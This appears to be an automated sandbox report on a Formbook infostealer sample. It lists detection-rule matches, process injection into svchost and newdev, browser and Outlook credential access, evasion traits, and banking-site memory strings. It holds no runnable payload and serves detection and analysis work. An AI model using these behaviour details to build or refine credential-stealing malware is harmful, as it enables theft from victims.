            Source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@5/4
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEA06A GetLastError,FormatMessageW,0_2_00FEA06A
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FD81CB AdjustTokenPrivileges,CloseHandle,0_2_00FD81CB
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FD87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00FD87E1
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00FEB3FB
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FFEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00FFEE0D
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FF83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00FF83BB
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F84E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F84E89
            Source: C:\Users\user\Desktop\psibx9rXra.exeFile created: C:\Users\user\AppData\Local\Temp\aut81AB.tmpJump to behavior
            Source: psibx9rXra.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: newdev.exe, 00000005.00000003.2745985178.00000000035D4000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.0000000003605000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.00000000035D4000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.00000000035B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: psibx9rXra.exeReversingLabs: Detection: 68%
            Source: unknownProcess created: C:\Users\user\Desktop\psibx9rXra.exe "C:\Users\user\Desktop\psibx9rXra.exe"
            Source: C:\Users\user\Desktop\psibx9rXra.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\psibx9rXra.exe"
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeProcess created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"
            Source: C:\Windows\SysWOW64\newdev.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\psibx9rXra.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\psibx9rXra.exe"Jump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeProcess created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: psibx9rXra.exeStatic file information: File size 1365504 > 1048576
            Source: psibx9rXra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: psibx9rXra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: psibx9rXra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: psibx9rXra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: psibx9rXra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: psibx9rXra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: psibx9rXra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GFwdSeXZEVUZM.exe, 00000004.00000002.3447028542.00000000008CE000.00000002.00000001.01000000.00000005.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3446773550.00000000008CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: psibx9rXra.exe, 00000000.00000003.2193513593.0000000004240000.00000004.00001000.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2193144302.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2402494725.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400449383.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.0000000005300000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2559655792.0000000004F9B000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2561457724.000000000514C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.000000000549E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: psibx9rXra.exe, 00000000.00000003.2193513593.0000000004240000.00000004.00001000.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2193144302.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2402494725.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400449383.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.0000000005300000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2559655792.0000000004F9B000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2561457724.000000000514C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.000000000549E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: NewDev.pdbGCTL source: svchost.exe, 00000002.00000003.2463415655.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463536253.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463565816.000000000362A000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000002.3453208541.0000000001428000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: NewDev.pdb source: svchost.exe, 00000002.00000003.2463415655.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463536253.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463565816.000000000362A000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000002.3453208541.0000000001428000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: newdev.exe, 00000005.00000002.3458200823.000000000592C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.0000000003558000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000030FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000373EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: newdev.exe, 00000005.00000002.3458200823.000000000592C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.0000000003558000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000030FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000373EC000.00000004.80000000.00040000.00000000.sdmp
            Source: psibx9rXra.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: psibx9rXra.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: psibx9rXra.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: psibx9rXra.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: psibx9rXra.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F84B37 LoadLibraryA,GetProcAddress,0_2_00F84B37
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FA8945 push ecx; ret 0_2_00FA8958
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A87 pushad ; retf 2_2_00401AA5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A87 push ebx; iretd 2_2_00401C07
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E845 push FFFFFFA2h; retf 2_2_0041E85F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401846 push ebx; iretd 2_2_00401847
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004018CE push ebx; iretd 2_2_004018CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405159 push BCCE478Fh; retf 2_2_0040515E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B91D push EC822BC1h; iretd 2_2_0040B922
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411922 push ds; iretd 2_2_00411924
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019B5 push ebx; iretd 2_2_004019B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A68 push ebx; iretd 2_2_00401A69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022CB push ebx; iretd 2_2_004022CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022D9 push ebx; iretd 2_2_004022DA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040237A pushad ; retf 2_2_004023B5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401B04 push ebx; iretd 2_2_00401C07
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402311 push ebx; iretd 2_2_00402350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023C4 pushad ; retf 2_2_004023B5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403470 push eax; ret 2_2_00403472
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004146BD pushad ; iretd 2_2_004146CA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404FDC push es; ret 2_2_00404FDF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401FF6 push ebx; iretd 2_2_00401FF7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx2_2_03C309B6
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F848D7
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_01005376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01005376
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FA3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FA3187
            Source: C:\Users\user\Desktop\psibx9rXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\psibx9rXra.exeAPI/Special instruction interceptor: Address: 19964EC
            Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: psibx9rXra.exe, 00000000.00000003.2185036940.00000000019E1000.00000004.00000020.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2184929206.0000000001988000.00000004.00000020.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000002.2208212007.00000000019E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXET
            Source: psibx9rXra.exe, 00000000.00000003.2185036940.00000000019E1000.00000004.00000020.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2184929206.0000000001988000.00000004.00000020.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000002.2208212007.00000000019E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
            Source: C:\Windows\SysWOW64\newdev.exeWindow / User API: threadDelayed 658Jump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeWindow / User API: threadDelayed 9316Jump to behavior
            Source: C:\Users\user\Desktop\psibx9rXra.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105572
            Source: C:\Users\user\Desktop\psibx9rXra.exeAPI coverage: 4.4 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\newdev.exe TID: 2224Thread sleep count: 658 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\newdev.exe TID: 2224Thread sleep time: -1316000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exe TID: 2224Thread sleep count: 9316 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\newdev.exe TID: 2224Thread sleep time: -18632000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\newdev.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FE445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FE445A
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEC6D1 FindFirstFileW,FindClose,0_2_00FEC6D1
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FEC75C
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEEF95
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF0F2
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEF3F3
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FE37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE37EF
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FE3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3B12
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEBCBC
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F849A0
            Source: 0O4Q3IKB.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 0O4Q3IKB.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 0O4Q3IKB.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 0O4Q3IKB.5.drBinary or memory string: discord.comVMware20,11696487552f
            Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_autoindex_autofill_edge_custom_data_1bal block list test formVMware20,11696487552
            Source: 0O4Q3IKB.5.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696487552|UE
            Source: 0O4Q3IKB.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: swordVMware20,11696487552}
            Source: 0O4Q3IKB.5.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: GFwdSeXZEVUZM.exe, 00000007.00000002.3450683144.000000000105F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
            Source: 0O4Q3IKB.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 0O4Q3IKB.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
